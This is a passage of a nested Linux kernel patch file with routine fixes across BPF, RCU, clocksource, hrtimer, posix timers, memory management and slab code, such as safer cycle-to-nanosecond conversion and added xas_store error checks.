+ 			  const struct btf_type *key_type,
+ 			  const struct btf_type *value_type)
+ {
+-	/* Keys must have struct bpf_lpm_trie_key embedded. */
++	/* Keys must have struct bpf_lpm_trie_key_u8 embedded. */
+ 	return BTF_INFO_KIND(key_type->info) != BTF_KIND_STRUCT ?
+ 	       -EINVAL : 0;
+ }
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8973d3c9597ce..4efa50eb07d72 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -291,61 +291,6 @@ find_linfo(const struct bpf_verifier_env *env, u32 insn_off)
+ 	return &linfo[i - 1];
+ }
+ 
+-void bpf_verifier_vlog(struct bpf_verifier_log *log, const char *fmt,
+-		       va_list args)
+-{
+-	unsigned int n;
+-
+-	n = vscnprintf(log->kbuf, BPF_VERIFIER_TMP_LOG_SIZE, fmt, args);
+-
+-	WARN_ONCE(n >= BPF_VERIFIER_TMP_LOG_SIZE - 1,
+-		  "verifier log line truncated - local buffer too short\n");
+-
+-	if (log->level == BPF_LOG_KERNEL) {
+-		bool newline = n > 0 && log->kbuf[n - 1] == '\n';
+-
+-		pr_err("BPF: %s%s", log->kbuf, newline ? "" : "\n");
+-		return;
+-	}
+-
+-	n = min(log->len_total - log->len_used - 1, n);
+-	log->kbuf[n] = '\0';
+-	if (!copy_to_user(log->ubuf + log->len_used, log->kbuf, n + 1))
+-		log->len_used += n;
+-	else
+-		log->ubuf = NULL;
+-}
+-
+-static void bpf_vlog_reset(struct bpf_verifier_log *log, u32 new_pos)
+-{
+-	char zero = 0;
+-
+-	if (!bpf_verifier_log_needed(log))
+-		return;
+-
+-	log->len_used = new_pos;
+-	if (put_user(zero, log->ubuf + new_pos))
+-		log->ubuf = NULL;
+-}
+-
+-/* log_level controls verbosity level of eBPF verifier.
+- * bpf_verifier_log_write() is used to dump the verification trace to the log,
+- * so the user can figure out what's wrong with the program
+- */
+-__printf(2, 3) void bpf_verifier_log_write(struct bpf_verifier_env *env,
+-					   const char *fmt, ...)
+-{
+-	va_list args;
+-
+-	if (!bpf_verifier_log_needed(&env->log))
+-		return;
+-
+-	va_start(args, fmt);
+-	bpf_verifier_vlog(&env->log, fmt, args);
+-	va_end(args);
+-}
+-EXPORT_SYMBOL_GPL(bpf_verifier_log_write);
+-
+ __printf(2, 3) static void verbose(void *private_data, const char *fmt, ...)
+ {
+ 	struct bpf_verifier_env *env = private_data;
+@@ -359,20 +304,6 @@ __printf(2, 3) static void verbose(void *private_data, const char *fmt, ...)
+ 	va_end(args);
+ }
+ 
+-__printf(2, 3) void bpf_log(struct bpf_verifier_log *log,
+-			    const char *fmt, ...)
+-{
+-	va_list args;
+-
+-	if (!bpf_verifier_log_needed(log))
+-		return;
+-
+-	va_start(args, fmt);
+-	bpf_verifier_vlog(log, fmt, args);
+-	va_end(args);
+-}
+-EXPORT_SYMBOL_GPL(bpf_log);
+-
+ static const char *ltrim(const char *s)
+ {
+ 	while (isspace(*s))
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 489c25713edcb..455f67ff31b57 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1751,13 +1751,13 @@ static int css_populate_dir(struct cgroup_subsys_state *css)
+ 
+ 	if (!css->ss) {
+ 		if (cgroup_on_dfl(cgrp)) {
+-			ret = cgroup_addrm_files(&cgrp->self, cgrp,
++			ret = cgroup_addrm_files(css, cgrp,
+ 						 cgroup_base_files, true);
+ 			if (ret < 0)
+ 				return ret;
+ 
+ 			if (cgroup_psi_enabled()) {
+-				ret = cgroup_addrm_files(&cgrp->self, cgrp,
++				ret = cgroup_addrm_files(css, cgrp,
+ 							 cgroup_psi_files, true);
+ 				if (ret < 0)
+ 					return ret;
+diff --git a/kernel/pid.c b/kernel/pid.c
+index 3fbc5e46b7217..74834c04a0818 100644
+--- a/kernel/pid.c
++++ b/kernel/pid.c
+@@ -661,8 +661,11 @@ void __init pid_idr_init(void)
+ 
+ 	idr_init(&init_pid_ns.idr);
+ 
+-	init_pid_ns.pid_cachep = KMEM_CACHE(pid,
+-			SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT);
++	init_pid_ns.pid_cachep = kmem_cache_create("pid",
++			struct_size((struct pid *)NULL, numbers, 1),
++			__alignof__(struct pid),
++			SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT,
++			NULL);
+ }
+ 
+ static struct file *__pidfd_fget(struct task_struct *task, int fd)
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index 1daadbefcee3a..a575fabf697eb 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -47,7 +47,7 @@ static struct kmem_cache *create_pid_cachep(unsigned int level)
+ 		return kc;
+ 
+ 	snprintf(name, sizeof(name), "pid_%u", level + 1);
+-	len = sizeof(struct pid) + level * sizeof(struct upid);
++	len = struct_size((struct pid *)NULL, numbers, level + 1);
+ 	mutex_lock(&pid_caches_mutex);
+ 	/* Name collision forces to do allocation under mutex. */
+ 	if (!*pkc)
+diff --git a/kernel/rcu/rcu.h b/kernel/rcu/rcu.h
+index 48d8f754b730e..49ff955ed2034 100644
+--- a/kernel/rcu/rcu.h
++++ b/kernel/rcu/rcu.h
+@@ -10,6 +10,7 @@
+ #ifndef __LINUX_RCU_H
+ #define __LINUX_RCU_H
+ 
++#include <linux/slab.h>
+ #include <trace/events/rcu.h>
+ 
+ /*
+@@ -211,6 +212,12 @@ static inline void debug_rcu_head_unqueue(struct rcu_head *head)
+ }
+ #endif	/* #else !CONFIG_DEBUG_OBJECTS_RCU_HEAD */
+ 
++static inline void debug_rcu_head_callback(struct rcu_head *rhp)
++{
++	if (unlikely(!rhp->func))
++		kmem_dump_obj(rhp);
++}
++
+ extern int rcu_cpu_stall_suppress_at_boot;
+ 
+ static inline bool rcu_stall_is_suppressed_at_boot(void)
+diff --git a/kernel/rcu/srcutiny.c b/kernel/rcu/srcutiny.c
+index 33adafdad2613..5e7f336baa06a 100644
+--- a/kernel/rcu/srcutiny.c
++++ b/kernel/rcu/srcutiny.c
+@@ -138,6 +138,7 @@ void srcu_drive_gp(struct work_struct *wp)
+ 	while (lh) {
+ 		rhp = lh;
+ 		lh = lh->next;
++		debug_rcu_head_callback(rhp);
+ 		local_bh_disable();
+ 		rhp->func(rhp);
+ 		local_bh_enable();
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 929dcbc04d29c..f7825900bdfd7 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -1591,6 +1591,7 @@ static void srcu_invoke_callbacks(struct work_struct *work)
+ 	rhp = rcu_cblist_dequeue(&ready_cbs);
+ 	for (; rhp != NULL; rhp = rcu_cblist_dequeue(&ready_cbs)) {
+ 		debug_rcu_head_unqueue(rhp);
++		debug_rcu_head_callback(rhp);
+ 		local_bh_disable();
+ 		rhp->func(rhp);
+ 		local_bh_enable();
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index 456c956f481ef..bb6b037ef30fa 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -487,6 +487,7 @@ static void rcu_tasks_invoke_cbs(struct rcu_tasks *rtp, struct rcu_tasks_percpu
+ 	raw_spin_unlock_irqrestore_rcu_node(rtpcp, flags);
+ 	len = rcl.len;
+ 	for (rhp = rcu_cblist_dequeue(&rcl); rhp; rhp = rcu_cblist_dequeue(&rcl)) {
++		debug_rcu_head_callback(rhp);
+ 		local_bh_disable();
+ 		rhp->func(rhp);
+ 		local_bh_enable();
+diff --git a/kernel/rcu/tiny.c b/kernel/rcu/tiny.c
+index a33a8d4942c37..21c040cba4bd0 100644
+--- a/kernel/rcu/tiny.c
++++ b/kernel/rcu/tiny.c
+@@ -97,6 +97,7 @@ static inline bool rcu_reclaim_tiny(struct rcu_head *head)
+ 
+ 	trace_rcu_invoke_callback("", head);
+ 	f = head->func;
++	debug_rcu_head_callback(head);
+ 	WRITE_ONCE(head->func, (rcu_callback_t)0L);
+ 	f(head);
+ 	rcu_lock_release(&rcu_callback_map);
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index cd6144cea5a1a..dd6e15ca63b0c 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -1336,7 +1336,7 @@ EXPORT_SYMBOL_GPL(rcu_gp_slow_register);
+ /* Unregister a counter, with NULL for not caring which. */
+ void rcu_gp_slow_unregister(atomic_t *rgssp)
+ {
+-	WARN_ON_ONCE(rgssp && rgssp != rcu_gp_slow_suppress);
++	WARN_ON_ONCE(rgssp && rgssp != rcu_gp_slow_suppress && rcu_gp_slow_suppress != NULL);
+ 
+ 	WRITE_ONCE(rcu_gp_slow_suppress, NULL);
+ }
+@@ -2292,6 +2292,7 @@ static void rcu_do_batch(struct rcu_data *rdp)
+ 		trace_rcu_invoke_callback(rcu_state.name, rhp);
+ 
+ 		f = rhp->func;
++		debug_rcu_head_callback(rhp);
+ 		WRITE_ONCE(rhp->func, (rcu_callback_t)0L);
+ 		f(rhp);
+ 
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index cd9a59011dee9..a3650699463bb 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -20,6 +20,16 @@
+ #include "tick-internal.h"
+ #include "timekeeping_internal.h"
+ 
++static noinline u64 cycles_to_nsec_safe(struct clocksource *cs, u64 start, u64 end)
++{
++	u64 delta = clocksource_delta(end, start, cs->mask);
++
++	if (likely(delta < cs->max_cycles))
++		return clocksource_cyc2ns(delta, cs->mult, cs->shift);
++
++	return mul_u64_u32_shr(delta, cs->mult, cs->shift);
++}
++
+ /**
+  * clocks_calc_mult_shift - calculate mult/shift factors for scaled math of clocks
+  * @mult:	pointer to mult variable
+@@ -219,8 +229,8 @@ enum wd_read_status {
+ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow, u64 *wdnow)
+ {
+ 	unsigned int nretries, max_retries;
+-	u64 wd_end, wd_end2, wd_delta;
+ 	int64_t wd_delay, wd_seq_delay;
++	u64 wd_end, wd_end2;
+ 
+ 	max_retries = clocksource_get_max_watchdog_retry();
+ 	for (nretries = 0; nretries <= max_retries; nretries++) {
+@@ -231,9 +241,7 @@ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow,
+ 		wd_end2 = watchdog->read(watchdog);
+ 		local_irq_enable();
+ 
+-		wd_delta = clocksource_delta(wd_end, *wdnow, watchdog->mask);
+-		wd_delay = clocksource_cyc2ns(wd_delta, watchdog->mult,
+-					      watchdog->shift);
++		wd_delay = cycles_to_nsec_safe(watchdog, *wdnow, wd_end);
+ 		if (wd_delay <= WATCHDOG_MAX_SKEW) {
+ 			if (nretries > 1 && nretries >= max_retries) {
+ 				pr_warn("timekeeping watchdog on CPU%d: %s retried %d times before success\n",
+@@ -251,8 +259,7 @@ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow,
+ 		 * report system busy, reinit the watchdog and skip the current
+ 		 * watchdog test.
+ 		 */
+-		wd_delta = clocksource_delta(wd_end2, wd_end, watchdog->mask);
+-		wd_seq_delay = clocksource_cyc2ns(wd_delta, watchdog->mult, watchdog->shift);
++		wd_seq_delay = cycles_to_nsec_safe(watchdog, wd_end, wd_end2);
+ 		if (wd_seq_delay > WATCHDOG_MAX_SKEW/2)
+ 			goto skip_test;
+ 	}
+@@ -363,8 +370,7 @@ void clocksource_verify_percpu(struct clocksource *cs)
+ 		delta = (csnow_end - csnow_mid) & cs->mask;
+ 		if (delta < 0)
+ 			cpumask_set_cpu(cpu, &cpus_ahead);
+-		delta = clocksource_delta(csnow_end, csnow_begin, cs->mask);
+-		cs_nsec = clocksource_cyc2ns(delta, cs->mult, cs->shift);
++		cs_nsec = cycles_to_nsec_safe(cs, csnow_begin, csnow_end);
+ 		if (cs_nsec > cs_nsec_max)
+ 			cs_nsec_max = cs_nsec;
+ 		if (cs_nsec < cs_nsec_min)
+@@ -395,8 +401,8 @@ static inline void clocksource_reset_watchdog(void)
+ 
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+-	u64 csnow, wdnow, cslast, wdlast, delta;
+ 	int64_t wd_nsec, cs_nsec, interval;
++	u64 csnow, wdnow, cslast, wdlast;
+ 	int next_cpu, reset_pending;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
+@@ -453,12 +459,8 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 			continue;
+ 		}
+ 
+-		delta = clocksource_delta(wdnow, cs->wd_last, watchdog->mask);
+-		wd_nsec = clocksource_cyc2ns(delta, watchdog->mult,
+-					     watchdog->shift);
+-
+-		delta = clocksource_delta(csnow, cs->cs_last, cs->mask);
+-		cs_nsec = clocksource_cyc2ns(delta, cs->mult, cs->shift);
++		wd_nsec = cycles_to_nsec_safe(watchdog, cs->wd_last, wdnow);
++		cs_nsec = cycles_to_nsec_safe(cs, cs->cs_last, csnow);
+ 		wdlast = cs->wd_last; /* save these in case we print them */
+ 		cslast = cs->cs_last;
+ 		cs->cs_last = csnow;
+@@ -821,7 +823,7 @@ void clocksource_start_suspend_timing(struct clocksource *cs, u64 start_cycles)
+  */
+ u64 clocksource_stop_suspend_timing(struct clocksource *cs, u64 cycle_now)
+ {
+-	u64 now, delta, nsec = 0;
++	u64 now, nsec = 0;
+ 
+ 	if (!suspend_clocksource)
+ 		return 0;
+@@ -836,12 +838,8 @@ u64 clocksource_stop_suspend_timing(struct clocksource *cs, u64 cycle_now)
+ 	else
+ 		now = suspend_clocksource->read(suspend_clocksource);
+ 
+-	if (now > suspend_start) {
+-		delta = clocksource_delta(now, suspend_start,
+-					  suspend_clocksource->mask);
+-		nsec = mul_u64_u32_shr(delta, suspend_clocksource->mult,
+-				       suspend_clocksource->shift);
+-	}
++	if (now > suspend_start)
++		nsec = cycles_to_nsec_safe(suspend_clocksource, suspend_start, now);
+ 
+ 	/*
+ 	 * Disable the suspend timer to save power if current clocksource is
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 9bb88836c42e6..f62cc13b5f143 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -38,6 +38,7 @@
+ #include <linux/sched/deadline.h>
+ #include <linux/sched/nohz.h>
+ #include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
+ #include <linux/timer.h>
+ #include <linux/freezer.h>
+ #include <linux/compat.h>
+@@ -1284,6 +1285,8 @@ void hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
+ 	struct hrtimer_clock_base *base;
+ 	unsigned long flags;
+ 
++	if (WARN_ON_ONCE(!timer->function))
++		return;
+ 	/*
+ 	 * Check whether the HRTIMER_MODE_SOFT bit and hrtimer.is_soft
+ 	 * match on CONFIG_PREEMPT_RT = n. With PREEMPT_RT check the hard
+@@ -2220,8 +2223,8 @@ static void migrate_hrtimer_list(struct hrtimer_clock_base *old_base,
+ 
+ int hrtimers_cpu_dying(unsigned int dying_cpu)
+ {
++	int i, ncpu = cpumask_any_and(cpu_active_mask, housekeeping_cpumask(HK_TYPE_TIMER));
+ 	struct hrtimer_cpu_base *old_base, *new_base;
+-	int i, ncpu = cpumask_first(cpu_active_mask);
+ 
+ 	tick_cancel_sched_timer(dying_cpu);
+ 
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index ed3c4a9543982..2d6cf93ca370a 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -140,25 +140,30 @@ static struct k_itimer *posix_timer_by_id(timer_t id)
+ static int posix_timer_add(struct k_itimer *timer)
+ {
+ 	struct signal_struct *sig = current->signal;
+-	int first_free_id = sig->posix_timer_id;
+ 	struct hlist_head *head;
+-	int ret = -ENOENT;
++	unsigned int cnt, id;
+ 
+-	do {
++	/*
++	 * FIXME: Replace this by a per signal struct xarray once there is
++	 * a plan to handle the resulting CRIU regression gracefully.
++	 */
++	for (cnt = 0; cnt <= INT_MAX; cnt++) {
+ 		spin_lock(&hash_lock);
+-		head = &posix_timers_hashtable[hash(sig, sig->posix_timer_id)];
+-		if (!__posix_timers_find(head, sig, sig->posix_timer_id)) {
++		id = sig->next_posix_timer_id;
++
++		/* Write the next ID back. Clamp it to the positive space */
++		sig->next_posix_timer_id = (id + 1) & INT_MAX;
++
++		head = &posix_timers_hashtable[hash(sig, id)];
++		if (!__posix_timers_find(head, sig, id)) {
+ 			hlist_add_head_rcu(&timer->t_hash, head);
+-			ret = sig->posix_timer_id;
++			spin_unlock(&hash_lock);
++			return id;
+ 		}
+-		if (++sig->posix_timer_id < 0)
+-			sig->posix_timer_id = 0;
+-		if ((sig->posix_timer_id == first_free_id) && (ret == -ENOENT))
+-			/* Loop over all possible ids completed */
+-			ret = -EAGAIN;
+ 		spin_unlock(&hash_lock);
+-	} while (ret == -ENOENT);
+-	return ret;
++	}
++	/* POSIX return code when no timer ID could be allocated */
++	return -EAGAIN;
+ }
+ 
+ static inline void unlock_timer(struct k_itimer *timr, unsigned long flags)
+diff --git a/lib/math/prime_numbers.c b/lib/math/prime_numbers.c
+index d42cebf7407fc..d3b64b10da1c5 100644
+--- a/lib/math/prime_numbers.c
++++ b/lib/math/prime_numbers.c
+@@ -6,8 +6,6 @@
+ #include <linux/prime_numbers.h>
+ #include <linux/slab.h>
+ 
+-#define bitmap_size(nbits) (BITS_TO_LONGS(nbits) * sizeof(unsigned long))
+-
+ struct primes {
+ 	struct rcu_head rcu;
+ 	unsigned long last, sz;
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index f97b221fb6567..98a1a05f2db2d 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -1492,7 +1492,7 @@ vm_fault_t do_huge_pmd_numa_page(struct vm_fault *vmf)
+ 	vmf->ptl = pmd_lock(vma->vm_mm, vmf->pmd);
+ 	if (unlikely(!pmd_same(oldpmd, *vmf->pmd))) {
+ 		spin_unlock(vmf->ptl);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	pmd = pmd_modify(oldpmd, vma->vm_page_prot);
+@@ -1525,23 +1525,16 @@ vm_fault_t do_huge_pmd_numa_page(struct vm_fault *vmf)
+ 	if (migrated) {
+ 		flags |= TNF_MIGRATED;
+ 		page_nid = target_nid;
+-	} else {
+-		flags |= TNF_MIGRATE_FAIL;
+-		vmf->ptl = pmd_lock(vma->vm_mm, vmf->pmd);
+-		if (unlikely(!pmd_same(oldpmd, *vmf->pmd))) {
+-			spin_unlock(vmf->ptl);
+-			goto out;
+-		}
+-		goto out_map;
++		task_numa_fault(last_cpupid, page_nid, HPAGE_PMD_NR, flags);
++		return 0;
+ 	}
+ 
+-out:
+-	if (page_nid != NUMA_NO_NODE)
+-		task_numa_fault(last_cpupid, page_nid, HPAGE_PMD_NR,
+-				flags);
+-
+-	return 0;
+-
++	flags |= TNF_MIGRATE_FAIL;
++	vmf->ptl = pmd_lock(vma->vm_mm, vmf->pmd);
++	if (unlikely(!pmd_same(oldpmd, *vmf->pmd))) {
++		spin_unlock(vmf->ptl);
++		return 0;
++	}
+ out_map:
+ 	/* Restore the PMD */
+ 	pmd = pmd_modify(oldpmd, vma->vm_page_prot);
+@@ -1551,7 +1544,10 @@ vm_fault_t do_huge_pmd_numa_page(struct vm_fault *vmf)
+ 	set_pmd_at(vma->vm_mm, haddr, vmf->pmd, pmd);
+ 	update_mmu_cache_pmd(vma, vmf->address, vmf->pmd);
+ 	spin_unlock(vmf->ptl);
+-	goto out;
++
++	if (page_nid != NUMA_NO_NODE)
++		task_numa_fault(last_cpupid, page_nid, HPAGE_PMD_NR, flags);
++	return 0;
+ }
+ 
+ /*
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index 65bd0b105266a..085fca1fa27af 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -55,6 +55,7 @@ enum scan_result {
+ 	SCAN_CGROUP_CHARGE_FAIL,
+ 	SCAN_TRUNCATED,
+ 	SCAN_PAGE_HAS_PRIVATE,
++	SCAN_STORE_FAILED,
+ };
+ 
+ #define CREATE_TRACE_POINTS
+@@ -1840,6 +1841,15 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 					goto xa_locked;
+ 				}
+ 				xas_store(&xas, hpage);
++				if (xas_error(&xas)) {
++					/* revert shmem_charge performed
++					 * in the previous condition
++					 */
++					mapping->nrpages--;
++					shmem_uncharge(mapping->host, 1);
++					result = SCAN_STORE_FAILED;
++					goto xa_locked;
++				}
+ 				nr_none++;
+ 				continue;
+ 			}
+@@ -1991,6 +2001,11 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 
+ 		/* Finally, replace with the new page. */
+ 		xas_store(&xas, hpage);
++		/* We can't get an ENOMEM here (because the allocation happened before),
++		 * but let's check for errors (XArray implementation can be
++		 * changed in the future)
++		 */
++		WARN_ON_ONCE(xas_error(&xas));
+ 		continue;
+ out_unlock:
+ 		unlock_page(page);
+@@ -2028,6 +2043,11 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 	/* Join all the small entries into a single multi-index entry */
+ 	xas_set_order(&xas, start, HPAGE_PMD_ORDER);
+ 	xas_store(&xas, hpage);
++	/* Here we can't get an ENOMEM (because entries were
++	 * previously allocated), but let's check for errors
++	 * (XArray implementation can be changed in the future)
++	 */
++	WARN_ON_ONCE(xas_error(&xas));
+ xa_locked:
+ 	xas_unlock_irq(&xas);
+ xa_unlocked:
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 4570d3e315cf1..4ad6e8345b364 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -4857,9 +4857,12 @@ static ssize_t memcg_write_event_control(struct kernfs_open_file *of,
+ 	buf = endp + 1;
+ 
+ 	cfd = simple_strtoul(buf, &endp, 10);
+-	if ((*endp != ' ') && (*endp != '\0'))
++	if (*endp == '\0')
++		buf = endp;
++	else if (*endp == ' ')
++		buf = endp + 1;
++	else
+ 		return -EINVAL;
+-	buf = endp + 1;
+ 
+ 	event = kzalloc(sizeof(*event), GFP_KERNEL);
+ 	if (!event)
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 8067c1e22af9b..56b2dcc2c0d63 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -2208,7 +2208,7 @@ struct memory_failure_entry {
+ struct memory_failure_cpu {
+ 	DECLARE_KFIFO(fifo, struct memory_failure_entry,
+ 		      MEMORY_FAILURE_FIFO_SIZE);
+-	spinlock_t lock;
++	raw_spinlock_t lock;
+ 	struct work_struct work;
+ };
+ 
+@@ -2234,20 +2234,22 @@ void memory_failure_queue(unsigned long pfn, int flags)
+ {
+ 	struct memory_failure_cpu *mf_cpu;
+ 	unsigned long proc_flags;
++	bool buffer_overflow;
+ 	struct memory_failure_entry entry = {
+ 		.pfn =		pfn,
+ 		.flags =	flags,
+ 	};
+ 
+ 	mf_cpu = &get_cpu_var(memory_failure_cpu);
+-	spin_lock_irqsave(&mf_cpu->lock, proc_flags);
+-	if (kfifo_put(&mf_cpu->fifo, entry))
++	raw_spin_lock_irqsave(&mf_cpu->lock, proc_flags);
++	buffer_overflow = !kfifo_put(&mf_cpu->fifo, entry);
++	if (!buffer_overflow)
+ 		schedule_work_on(smp_processor_id(), &mf_cpu->work);
+-	else
++	raw_spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
++	put_cpu_var(memory_failure_cpu);
++	if (buffer_overflow)
+ 		pr_err("buffer overflow when queuing memory failure at %#lx\n",
+ 		       pfn);
+-	spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
+-	put_cpu_var(memory_failure_cpu);
+ }
+ EXPORT_SYMBOL_GPL(memory_failure_queue);
+ 
+@@ -2260,9 +2262,9 @@ static void memory_failure_work_func(struct work_struct *work)
+ 
+ 	mf_cpu = container_of(work, struct memory_failure_cpu, work);
+ 	for (;;) {
+-		spin_lock_irqsave(&mf_cpu->lock, proc_flags);
++		raw_spin_lock_irqsave(&mf_cpu->lock, proc_flags);
+ 		gotten = kfifo_get(&mf_cpu->fifo, &entry);
+-		spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
++		raw_spin_unlock_irqrestore(&mf_cpu->lock, proc_flags);
+ 		if (!gotten)
+ 			break;
+ 		if (entry.flags & MF_SOFT_OFFLINE)
+@@ -2292,7 +2294,7 @@ static int __init memory_failure_init(void)
+ 
+ 	for_each_possible_cpu(cpu) {
+ 		mf_cpu = &per_cpu(memory_failure_cpu, cpu);
+-		spin_lock_init(&mf_cpu->lock);
++		raw_spin_lock_init(&mf_cpu->lock);
+ 		INIT_KFIFO(mf_cpu->fifo);
+ 		INIT_WORK(&mf_cpu->work, memory_failure_work_func);
+ 	}
+diff --git a/mm/memory.c b/mm/memory.c
+index 301c74c444385..73085e36aabac 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -4786,7 +4786,7 @@ static vm_fault_t do_numa_page(struct vm_fault *vmf)
+ 	spin_lock(vmf->ptl);
+ 	if (unlikely(!pte_same(*vmf->pte, vmf->orig_pte))) {
+ 		pte_unmap_unlock(vmf->pte, vmf->ptl);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	/* Get the normal PTE  */
+@@ -4841,21 +4841,17 @@ static vm_fault_t do_numa_page(struct vm_fault *vmf)
+ 	if (migrate_misplaced_page(page, vma, target_nid)) {
+ 		page_nid = target_nid;
+ 		flags |= TNF_MIGRATED;
+-	} else {
+-		flags |= TNF_MIGRATE_FAIL;
+-		vmf->pte = pte_offset_map(vmf->pmd, vmf->address);
+-		spin_lock(vmf->ptl);
+-		if (unlikely(!pte_same(*vmf->pte, vmf->orig_pte))) {
+-			pte_unmap_unlock(vmf->pte, vmf->ptl);
+-			goto out;
+-		}
+-		goto out_map;
++		task_numa_fault(last_cpupid, page_nid, 1, flags);
++		return 0;
+ 	}
+ 
+-out:
+-	if (page_nid != NUMA_NO_NODE)
+-		task_numa_fault(last_cpupid, page_nid, 1, flags);
+-	return 0;
++	flags |= TNF_MIGRATE_FAIL;
++	vmf->pte = pte_offset_map(vmf->pmd, vmf->address);
++	spin_lock(vmf->ptl);
++	if (unlikely(!pte_same(*vmf->pte, vmf->orig_pte))) {
++		pte_unmap_unlock(vmf->pte, vmf->ptl);
++		return 0;
++	}
+ out_map:
+ 	/*
+ 	 * Make it present again, depending on how arch implements
+@@ -4869,7 +4865,10 @@ static vm_fault_t do_numa_page(struct vm_fault *vmf)
+ 	ptep_modify_prot_commit(vma, vmf->address, vmf->pte, old_pte, pte);
+ 	update_mmu_cache(vma, vmf->address, vmf->pte);
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+-	goto out;
++
++	if (page_nid != NUMA_NO_NODE)
++		task_numa_fault(last_cpupid, page_nid, 1, flags);
++	return 0;
+ }
+ 
+ static inline vm_fault_t create_huge_pmd(struct vm_fault *vmf)
+diff --git a/mm/slab_common.c b/mm/slab_common.c
+index 4736c0e6093fa..2a66be8ffa6be 100644
+--- a/mm/slab_common.c
++++ b/mm/slab_common.c
+@@ -523,26 +523,6 @@ bool slab_is_available(void)
+ }
+ 
+ #ifdef CONFIG_PRINTK
+-/**
+- * kmem_valid_obj - does the pointer reference a valid slab object?
+- * @object: pointer to query.
+- *
+- * Return: %true if the pointer is to a not-yet-freed object from
+- * kmalloc() or kmem_cache_alloc(), either %true or %false if the pointer
+- * is to an already-freed object, and %false otherwise.
+- */
+-bool kmem_valid_obj(void *object)
+-{
+-	struct folio *folio;
+-
+-	/* Some arches consider ZERO_SIZE_PTR to be a valid address. */
+-	if (object < (void *)PAGE_SIZE || !virt_addr_valid(object))
+-		return false;
+-	folio = virt_to_folio(object);
+-	return folio_test_slab(folio);
+-}
+-EXPORT_SYMBOL_GPL(kmem_valid_obj);
+-
+ static void kmem_obj_info(struct kmem_obj_info *kpp, void *object, struct slab *slab)
+ {
+ 	if (__kfence_obj_info(kpp, object, slab))
+@@ -561,11 +541,11 @@ static void kmem_obj_info(struct kmem_obj_info *kpp, void *object, struct slab *
+  * and, if available, the slab name, return address, and stack trace from
+  * the allocation and last free path of that object.
+  *
+- * This function will splat if passed a pointer to a non-slab object.
+- * If you are not sure what type of object you have, you should instead
+- * use mem_dump_obj().
++ * Return: %true if the pointer is to a not-yet-freed object from
++ * kmalloc() or kmem_cache_alloc(); either %true or %false (the result
++ * is unreliable) if the pointer is to an already-freed object; %false otherwise.
+  */
+-void kmem_dump_obj(void *object)
++bool kmem_dump_obj(void *object)
+ {
+ 	char *cp = IS_ENABLED(CONFIG_MMU) ? "" : "/vmalloc";
+ 	int i;
+@@ -573,13 +553,13 @@ void kmem_dump_obj(void *object)
+ 	unsigned long ptroffset;
+ 	struct kmem_obj_info kp = { };
+ 
+-	if (WARN_ON_ONCE(!virt_addr_valid(object)))
+-		return;
++	/* Some arches consider ZERO_SIZE_PTR to be a valid address. */
++	if (object < (void *)PAGE_SIZE || !virt_addr_valid(object))
++		return false;
+ 	slab = virt_to_slab(object);
+-	if (WARN_ON_ONCE(!slab)) {
+-		pr_cont(" non-slab memory.\n");
+-		return;
+-	}
++	if (!slab)
++		return false;
++
+ 	kmem_obj_info(&kp, object, slab);
+ 	if (kp.kp_slab_cache)
+ 		pr_cont(" slab%s %s", cp, kp.kp_slab_cache->name);
+@@ -616,6 +596,7 @@ void kmem_dump_obj(void *object)
+ 		pr_info("    %pS\n", kp.kp_free_stack[i]);
+ 	}
+ 
++	return true;
+ }
+ EXPORT_SYMBOL_GPL(kmem_dump_obj);
